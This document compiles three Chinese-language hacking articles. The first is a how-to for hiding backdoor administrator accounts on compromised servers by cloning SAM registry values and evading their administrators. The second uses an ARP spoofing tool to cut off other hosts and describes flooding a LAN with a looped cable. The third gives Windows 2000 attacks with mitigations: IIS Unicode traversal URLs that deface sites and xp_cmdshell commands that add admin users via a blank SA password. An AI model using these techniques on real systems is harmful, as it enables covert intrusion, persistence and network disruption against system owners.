Hacker技术

克隆帐户相关知识

相信大家都用过克隆帐户吧。无论是用工具还是用手工,克隆帐户无疑是隐藏帐户的最好选择。但是看见网上的文章都讲的特别麻烦。这样那样的。其实克隆帐户很简单。就是复制administrator的注册表项。本篇文章针对已经使用过克隆的用户,不针对对克隆帐户一无所知者。我只讲述下克隆的原理和方法。希望对大家有所启发。
原理:我们的帐户在注册表里都有他相应的键值,具体在 “[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users ”administrator 的 项为 “000001F4”下面有 2个二进制值 一个 是“F”一个是“V”。我一般克隆的都是 Guest用户,所以我就拿这个克隆这个用户做例子,克隆其他用户方法相同。Guest的项为 “000001F5”。其他用户所对应的项可以从 “[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names”下查看。我们所要做的就是把 “1F4”下的“F”和“V”值复制到“1F5”下的对应值里。这就是所说的克隆帐户。

1 简单克隆:
a,原理:只复制“F” 值。这样克隆出来的帐户隐蔽性比完全克隆(一会要说到)要低些,但是对自己方便些。如果肉鸡的管理员不是太厉害的话,建议你用这个方法。这样克隆出来的用户如果登陆上去,所用的桌面了什么的都是administrator的,也就是说你在系统里的文件“C:\Documents and Settings\Administrator”和admin是一样的。而非以前的“C:\Documents and Settings\Guest”。但是在“query user”和“终端服务管理器”里面你所登陆的用户还是“Guest”,还有就是用命令“net localgroup administrators”还是可以看出Guest是管理员来,这就是我所说的隐蔽性比完全克隆要低些。但是在net下,和用户管理中都看不出 Guest用户有什么问题。
b,具体方法:无论你用什么方法,看你个人习惯了,用 “system”权限打开“注册表”,我喜欢用 psu 命令格式为 psu -p regedit -PID 这里解释一下,后面的PID是系统进程winlogon的值.然后打开[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\ Account\Users\000001F4]打开他的“F”值,然后复制到 “1F5”的“F”值里面。然后在CMD下(必须),给Guest改密码(net user guest password)然后激活guest帐户(net user guest /active:y),然后我们把他禁用 (net user guest /active:n )简单!END

2 完全克隆
a,原理:全部复制“F”和“V”值。这样方法克隆出来的2个帐户其实在系统里是一个帐户,这样隐蔽性最高,除非用专业工具查看,否则在 net 和用户管理中,还有“net localgroup administrators”都看不出有什么问题来。还有最重要的一点,如果你登陆上去后,在“query user”和“终端服务管理器”里面你所登陆的用户上面显示的是“administrator”,好玩不。:)这样我们就达到了超级隐蔽的目的。在这里我要说明的一点就是,如果你用这个克隆方法弄出来的帐户登陆的话,其实你登陆的是administrator的界面。也就是说,假设你使用克隆帐户通过 3389登陆着,在你断开连接没有注销的时候,如果administrator也使用3389登陆,那他登陆的将是你的会话!!你那个会话上所保留的操作对方也是可以看见的,因为你们2个现在在同一个会话中!而我所说的不方便就是指的这点。但是如果3389是你开的,而管理员不会通过远程登陆服务器,那你就爽了。你们的会话就不是一个。还有如果你用简单克隆的方法克隆下来的帐户登陆,那你们登陆的不是一个会话,帐户还是不同的2个帐户,可以放心。
b,具体方法:方法和简单克隆的一样。不同的就是全部复制“F”和“V”值。你也可以直接导出[HKEY_LOCAL_MACHINE\SAM\SAM\ Domains\Account\Users\000001F4]的项。然后编辑导出的注册表文件,把里面的“000001F4”改成 “000001F5”,然后在给他导入进去就OK了。然后在CMD下(必须),给Guest改密码(net user guest password)然后激活guest帐户(net user guest /active:y),然后我们把他禁用 (net user guest /active:n )简单!END
3 最后提醒一下.克隆完成后除了建立的时候我要求的更改密码千万不要再次对克隆后的帐户更改密码!.因为只要你再更改密码,你所克隆的帐户将暴露!

4 说了这些,希望对大家有个帮助。说到这里了,还想多说几句,经常看到一些人在入侵一台服务器后堂而皇之地创建一个管理员组的用户,似乎当管理员不存在一般,或者弄个欺骗自己的Admin$之类的帐户。我想说的是管理员不是傻子,虽说带“$”的帐户在“net user”里面看不见,可在计算机管理的用户管理中可是明明白白在那摆着呢。如果你想你的肉鸡可以留的长久的话,那你就聪明点。我还想对那些管理员说几句,现在大家的安全意识都提高了,都知道及时打补丁了什么的,还有知道把密码设置的特变态。可是你们忽视了第三方软件的安全性。比如危害很大的SQL IIS Server-u 等。对计算机的安全我认为可以分为3个方面。第一个是系统的安全,这个就通过简单的打几个补丁就可以解决。第二个就是设置方面的安全。你一个固若金汤的系统,可你给弄了空口令,不笑死那些小黑们。对这个方面,你就弄变态密码就行,但是我要提醒下,你设变态密码可以,但是不要为了防止自己记不住,而写个文本,把密码全放里面。我就弄过一个机器,是通过第三方软件的漏洞进入的。在进了机器后我翻看他盘里的东西的时候突然看到一个文本pass.txt,我自然的打开看看了,看到的是他们整个网络的主干服务器和路由的密码!!而且还都是变态密码,我都晕了。后来知道哪个机器是网管的机器,其实他的的防护还是很严的,系统漏洞根本没有,后来知道他的所有密码都极其变态,爆破我看爆破到地球毁灭都没可能。:)如果没有第三方软件的漏洞的话我是进不去的。所以我要说到的就是关于第三方软件的安全问题。其实我觉得关于安全设置和第三方软件可以归到一块。好多第三方软件的漏洞都是通过不安全的设置而出现的漏洞。比如SQL 的 SA 空口令,SA的权限又高,连上去直接是SYSTEM权限。还有就是最好使用最新版本的软件。比如server-u。这个也是我的习惯,所有东西都是最新版的。

非网管对付ARP欺骗的一个思路

非网管对付ARP欺骗的一个思路
首先不知道ARP欺骗的先参考其他文章,另外我不会详细地写具体过程,但是只要你自己动动手,一切都是那么简单。

ARP欺骗有两个目标,一种是欺骗网关,比如NETCUT,一种欺骗目标主机,比如你的电脑,对于欺骗目标主机的比如聚生网管,只要是XP系统,使用网关IP-MAC绑定后,他们都无法在对你进行欺骗,如果对方用IP地址冲突,那你装个防火墙就可以解决了。

麻烦的是用NETCUT等来欺骗网关的,因为你不是网管,否则直接在网关上绑定IP-MAC就行了,但是你现在除了一条网线连到交换机其他你没有任何可动的东西,你明明知道有人欺骗网关让你上不去网,但是你没有办法破解。

下面我介绍使用一个叫做ArpCheatSniffer V1.0的小软件,该软件可以嗅探和欺骗,我们主要用它的欺骗功能,这个软件发送ARP查询的速度要比NETCUT的快的多,所以当有人用NETCUT从网关上剪断你的时候,你就可以用这个DD向网关发送你的正确的MAC地址,也就是说你一直保持网关*的IP-MAC关系是正确的。

附件是ArpCheatSniffer V1.0

这个软件需要安装WINPCAP,附件中自带的WINPCAP好像只能用于2000的系统,XP似乎是不能读取网卡,我用NETCUT1.5自带安装的WINCAP就可以

对于XP系统的的使用,我建议先在网上找个1.5的NETCUT安装到你电脑,这样就会附带安装一个WINPCAP,至于 WINPCAP3.0和3.1,我测试了不行。

安装完WINPCAP,将附件中的arpsf.exe拷贝到比如C盘,然后用CMD打开命令台,在C:根目录下执行arpsf.exe(注意大小写),就会有该小工具的使用帮助,我们用的命令主要是

arpsf -onlycheat -t 受骗主机 -c 源IP 原MAC地址

然后读取网卡,你选择网卡号码,比如0,之后软件自动读取MAC地址并开始欺骗。

举例子,比如网关是192.168.0.1 我的主机地址是2,我的真实MAC是888888888888

当我被NETCUT剪掉的时候,我用这个工具让他一直发送真确的MAC地址给网关

就执行 arpsf -onlycheat -t 192.168.0.1 -c 192.168.0.2 888888888888

之后就可以正常上网了,NETCUT就拿你没办法了。

当然我们现在是用它来反欺骗,你也可以用它来欺骗网关,对破坏网络的人以牙还牙,或者比如破坏网络的人的MAC地址是666666666666,那你也可以这样剪掉它

arpsf -onlycheat -t 192.168.0.1 -c 10.10.10.10 666666666666

这个 10.10.10.10可以任意指定,只要不是特殊地址就可以,当然不能是那个倒霉蛋的真实IP。

下面是我运行arpsf欺骗网关的一个例子:

==========================

Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator>cd\

C:\>arpsf -onlycheat -t 192.168.4.254 -c 192.168.4.52 333333333333

======================================================

Arp Cheat And Sniffer V1.0
powered by shadow @2005/5/8
my web:[URL="http://www.codehome.6600.0rg"]http://www.codehome.6600.0rg[/url]

======================================================

Windows ver is NT
0:\Device\Packet_{DBEF277B-BA37-41EE-889E-97E512B5F28B}
1:\Device\Packet_NdisWanIp
2:\Device\Packet_NdisWanBh

Please choose a adapter with num:0

Try to get Mac of [ 192.168.4.52 ]
This IP's MAc is: [ 00e04c54e56b ]
+OK:获取获取欺骗源真实mac地址成功!
Try to get Mac of [ 192.168.4.254 ]

-Can not get mac by netbios -_-
-Try to use ping to get mac...

Pinging 192.168.4.254 with 32 bytes of data:

Reply from 192.168.4.254: bytes=32 time<1ms TTL=255 Reply from 192.168.4.254: bytes=32 time<1ms TTL=255 Reply from 192.168.4.254: bytes=32 time<1ms TTL=255 Reply from 192.168.4.254: bytes=32 time<1ms TTL=255 Ping statistics for 192.168.4.254: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms +ping ok done... This IP's MAc is: [ 0015f973be00 ] +OK:获取目标mac地址成功! 欺骗源ip: 192.168.4.52 欺骗源mac: 333333333333 受骗主机: 192.168.4.254 受骗的mac: 0015f973be00 -->开始欺骗主机...
................................................................................
......^C
C:\>

================================

只要不关掉窗口,欺骗/反欺骗就一直进行下去。

最后附上怎么去检测是你主机被欺骗了还是网关被欺骗了

运行arp -a 查看记录,如果发现网关指向的地址不是真实的网关地址,那么你主机就是被人欺骗了,甚至你可以看到有两个IP都是这个地址,那这个IP就是那个破坏者。

如果主机没有被欺骗还是上不了网

那么你ping -t 网关,如果这时候能通,那可能是网关上有什么限制不能上网,没办法搞,如果不通,网关又是开着的,那么你可以再打开一个窗口用arp -d删掉arp缓存记录,这样你ping 网关的时候你电脑会向网关发送arp请求,如果是因为网关被人欺骗,那么在你删掉缓存后的几个ICMP包是可以正确地从网关返回来的,也就是ping 通了,几个数据包后又断了(因为有人一直在欺骗网关),然后再删除缓存,又可以通几秒钟。

有时候也许那个破坏者是网管,你也可以尝试修改你的网卡地址和IP地址然后再进行。

最后,教个更绝的办法,做个水晶头,将1、3脚和2、6脚分别短接,然后用直通的水晶头转换器(不知道怎么叫,就是两边都是RJ45座的那种)将你的网线和这个特殊的水晶头连起来,哼,不让上网?那么大家都不要上了,这个是死循环啊要被鞭笞的,整个网络都是网络风暴,什么黑客什么欺骗什么攻击统统无用,当然自己也不能用网络了,而且后果可能是你的网线被网管从交换机上拔下来并警告通缉!!一般情况千万不要这样做,如果有重要的数据业务那你惹祸就大了。到时候我可不说这是我告诉你的。

系统安全系列之Windows 2000漏洞集锦

对于Windows 2000的强大的功能和全新的构架我们都不得不叹服微软的实力,可以预见Windows 2000将成为新一代服务器操作系统的主流,同时也成为黑客攻击的对象。但是由于新的Windows2000的全新构架很大程度都依赖于Active Directory(又称之为AD),这使得许许多多的管理员在忙于适应新的操作系统,和对原来的资料进行系统的迁移,而对Windows 2000的安全性问题还没有引起足够重视。

本文详细介绍黑客在攻击Windows 2000系统时经常利用的一些漏洞和具体步骤以及应对策略,让网络系统管理员在维护系统时尽量做到有的放矢。有一句话非常有道理:“世界上没有绝对愚蠢的系统,只有绝对愚蠢的管理员。”只要我们的网络管理员能够细心地维护系统,相信黑客们是没有可乘之机的。

登陆输入法漏洞

这里我们首先介绍一个登录错误,也就是常说的输入法漏洞。当我们启动Windows2000进行到登录验证的提示界面时,任何用户都可以打开各种输入法的帮助栏,并且可以利用其中具有的一些功能访问文件系统,这也就是说我们可以绕过了Windows2000的用户登录验证机制,并且能以最高管理员权限访问整个系统。所以说这个漏洞的危害性是很大的,而且当我们进入系统后,还可以利用Terminal

Server远程通信这个漏洞对系统进行攻击。默认的Windows2000系统自带的输入法中有这个漏洞的是:智能ABC,微软拼音,内码,全拼,双拼,郑码。所以就我感觉而言这个漏洞是首要修补的漏洞。

1、把不需要的输入法删除掉,例如郑码等。

2、但是毕竟我们不能把所有的自带输入法都删除,如果我们要使用有漏洞的输入法也可以把那个输入法的帮助文件删除掉。这些帮助文件通常在win2000的安装目录下(如:C:\WINNT)的\help目录下,对应的帮助文件是:

※ WINIME.CHM 输入法操作指南
※ WINSP.CHM 双拼输入法帮助
※ WINZM.CHM 郑码输入法帮助
※ WINPY.CHM 全拼输入法帮助
※ WINGB.CHM 内码输入法帮助

3、微软公司对于此问题发布了MS00-069安全公告,并在互联网上给出了简体中文Windows2000和英文版Windows2000的补丁。所以请尽快打上补丁。

NetBIOS的信息泄漏

接下来我们谈一下NetBIOS的共享入侵.这个问题从NT刚发行到现在就从来没有解决。而且它一直由来都是NT系统构架最常见的入侵手段。特别值得一提的就是那个IPC$Null session(空会话)在NT系统里都是已知的安全隐患。虽然打了SP3后可以通过修改注册表来对其进行限制。但不知道为什么Windows2000还是原封不动地保留着这个空对话。那么就让我们来看看空会话能给入侵者带来什么样的信息:

net use \\server\IPC$ "" /user:"" //此命令用来建立一个空会话
net view \\server //此命令用来查看远程服务器的共享资源
服务器名称      注释
-------------------------------------------------------
\\pc1
\\pc2
命令成功完成。
net time \\server //此命令用来得到一个远程服务器的当前时间。
nbtstat -A server //此命令用来得到远程服务器的NetBIOS用户名字表
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
NULL <00> UNIQUE Registered
NULL <20> UNIQUE Registered
INTERNET <00> GROUP Registered
XIXI <03> UNIQUE Registered
INet~Services <1C> GROUP Registered
IS~NULL...... <00> UNIQUE Registered
INTERNET <1E> GROUP Registered
ADMINISTATOR <03> UNIQUE Registered
INTERNET <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
MAC Address = 00-54-4F-34-D8-80

看看,只不过用了几个系统自带的命令就得到了如此多的信息,那么我们有什么办法可以不让别人轻易得到这么多信息哪?

仅靠单纯的修改注册表是一劳永逸的。

HKEY-LOCAL_MACHINE\SYSTEM\CurrentControSet\Control\LSA
Value Name: RestrictAnonymous
Data Type: REG_DWORD
Value: 1

但如果一些服务你并不需要开放共享的话。那为什么不禁止它呢?在Windows2000里的方法和NT4的略有不同。它没有限制TCP/IP绑定在NetBISO上,但是我们可以在Internet协议(TCP/IP)属性的设置面板里选取高级(V)选项,然后选择TCP/IP 筛选,接着点选启用TCP/IP筛选,最后在TCP端口点选只允许,然后就可以添加你所想开放的服务的端口了。

奇怪的系统崩溃特性

此外Windows 2000有一个比较奇怪的特性,使用系统的终端用户可以通过按住右Ctrl,同时Press两次Scrool Lock按键,就轻易可以让整个Windows2000系统完全的崩溃。但同时又在C:\WinNT\下dump完整的当前系统内存记录,内存记录文件名是memory.dmp。当然,这个奇怪的特性默认状态下是关闭的,但是我们可以通过修改注册表的方法把它激活:

1、运行regedt32.exe (Windows2000的32位注册表编辑器);

2、选择主键HKEY_LOCAL_MACHINE\,然后找到SYSTEM\下的CurrentControlSet\,选择Services\,进入i8042prt\中的Parameters

3、新建一个双字节值;

4、将键名为CrashOnCtrlScroll;

5、然后在设置一个不为零的值;

6、退出重启。

当这一切做完后,你就可以尝试让系统崩溃了,按下按键后的效果为黑屏,将会出现以下信息:

*** STOP: 0x000000E2 (0x00000000,0x00000000,0x00000000,0x00000000)
The end-user manually generated the crashdump.

值得注意的是,这个奇怪的特性在WindowsNT4中也存在,不知道是不是微软程序员作测试的一个小功能。不过要是有黑客或者病毒利用它,也是很危险的。

Telnet的拒绝服务攻击

Windows中的Telnet一直以来都是网络管理员们最喜爱的网络实用工具之一,但是一个新的漏洞表明,在Windows2000中Telnet在守护其进程时,在已经被初始化的会话还未被复位的情况下很容易受到一种普通的拒绝服务攻击。而在2000年的2月份,拒绝服务攻击几乎成为了所有大型网站的恶梦。

Telnet连接后,在初始化的对话还未被复位的情况下,在一定的时间间隔之后,此时如果连接用户还没有提供登录的用户名及密码,Telnet的对话将会超时。直到用户输入一个字符之后连接才会被复位。如果恶意用户连接到Windows2000的Telnet守护进程中,并且对该连接不进行复位的话,他就可以有效地拒绝其他的任何用户连接该Telnet服务器,主要是因为此时Telnet的客户连接数的最大值是1。在此期间任何其他试图连接该Telnet服务器的用户都将会收到如下错误信息:

Microsoft Windows Workstation allows only 1 Telnet Client LicenseServer has closed
connection

察看“列出当前用户”选项时并不会显示超时的会话,因为该会话还没有成功地通过认证。

IIS服务泄漏文件内容

这是一个NSFOCUS安全小组发现的漏洞。当微软IIS 4.0/5.0(远东地区版本)在处理包含有不完整的双字节编码字符的HTTP命令请求时,会导致WEB目录下的文件内容被泄漏给远程攻击者。

Microsoft IIS远东地区版本包括中文(简体/繁体),日文,韩文版,由于特定的文字格式使它们都是使用的双字节编码格式。而当IIS接收到用户提交的一个HTTP请求时,如果文件名中包含非ASCII字符,IIS会检查这个字符是否为双字节编码中的前导字符(例如,日文的前导字符包含两段字符:0x81-0x9F, 0xE0-0xFC)。如果是前导字符,它会继续检查下一个字符是否为结尾字符。如果没有下一个字符,IIS会简单地丢弃这个前导字符,因为它并没有构成一个完整的双字节编码。然而,这种处理将导致IIS打开不同的文件而不是用户在请求中指定的文件。

攻击者通过提交一个特殊格式的URL, 可以使IIS使用某个ISAPI动态链接库打开某种它所不能解释的类型的文件,并获得该文件的内容。依赖于系统安装的ISAPI应用程序的类型,攻击者可能获得WEB根目录或者虚拟目录下的文件内容,这些文件可以是普通文本文件(.asp, .ini, .asa等等),也可以是二进制文件(.exe等等)。

黑客们会使用Unicode的方法利用这个漏洞:

Unicode(统一的字符编码标准, 采用双字节对字符进行编码)可以说是近一段时期以来最为流行的攻击入侵手段,仅国内近期就有江民公司等几个大的网站被这种入侵手段攻击。那我们就来谈一下这个很容易的利用Unicode漏洞配合IIS的漏洞进行入侵吧。

上面我们提到过由于某些双字节的Windows2000在处理某些特殊字符时与英文版本不同,然而利用这种IIS的漏洞,攻击者就可以通过这些特殊字符绕过IIS的目录审计远程执行任意命令。

http://server/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\

黑客们其实只要下面两句很简单的指令绕过IIS的审计就能够对网站的页面进行改写,所谓的黑了一个网站就是这么的简单。

http://server/scripts/..%c1%1c.. ... /cmd.exe?/c+copy+c:\winnt\system32
\cmd.exe+d:\inetpub\scripts\123.exe
http://server/scripts/123.exe?/c+echo+黑掉啦?+>+c:\inetpub\wwwroot\default.asp

这个问题已经在IIS 4.0 + SP6中得到解决,然而微软却让它在IIS 5.0中再度出现。

但该漏洞不会影响包括英语版在内的其他语言版本的IIS 4.0/5.0。

MS SQL Server的SA空密码攻击

在Windows2000中,企业级的用户一般都会用到另一个微软的产品,这个产品就是数据库管理软件 MS SQL Server,但是在与MS SQL Server配合使用中,我们发现了很多的问题。最后我们就简单讲一下安装了MS SQL Server的Windows2000的网络操作系统普遍面临的安全问题。

在安装MS SQL Server后,MS SQL Server会将产生一个默认的SA用户,而且初始密码在管理员没有设置的情况下为空。但是SA是SQL Server中非常重要的安全模块成员,这样一来黑客们就可以通过SQL Server的客户端进行数据库远程连接,然后再通过SQL的远程数据库管理命令xp_cmdshell stored procedure(扩展存储过程)来进行命令操作:

xp_cmdshell "net user id password /add"
Xp_cmdshell "net localgroup Administrators id /add"

就以上两条简单的命令入侵者就能在MS SQL Server的服务器上马上新建一个管理员级别的Administrators组的用户。所以我们这里提醒各位网管大人,在安装好SQL Server您需要做的第一件事就是把SA的空密码立即进行修改。这个问题就不要我告诉你应该在哪里改了吧?

而且在一般情况下,一些功能对管理员来说也是没有必要的。如果你不需要MS SQL Server 的xp_cmdshell(use sp_dropextendedproc "xp_cmdshell")这项功能就不要把xp_cmdshell extended stored proc(扩展存储过程)命令功能留着。

我们只需要在isql窗口中输入:

use master
sp_dropextendedproc 'xp_cmdshell'

然后打上Service Pack 3,这里提醒管理员们一下,一定要经常留意微软的补丁包文件,并且注意及时的把系统和软件更新到最新的补丁。

本文中我们讲述了几个近期来最为流行的漏洞和攻击方法,他们实现入侵是如此的方便,这里可有不少的网友会认为Windows2000是一个不安全的操作系统,但如果你这样的认为那就说明我的文章还没有写明白,所以在最后我要强调一下,只要我们常打补丁包,正确的给系统加设密码,我们的安全率就在85%左右。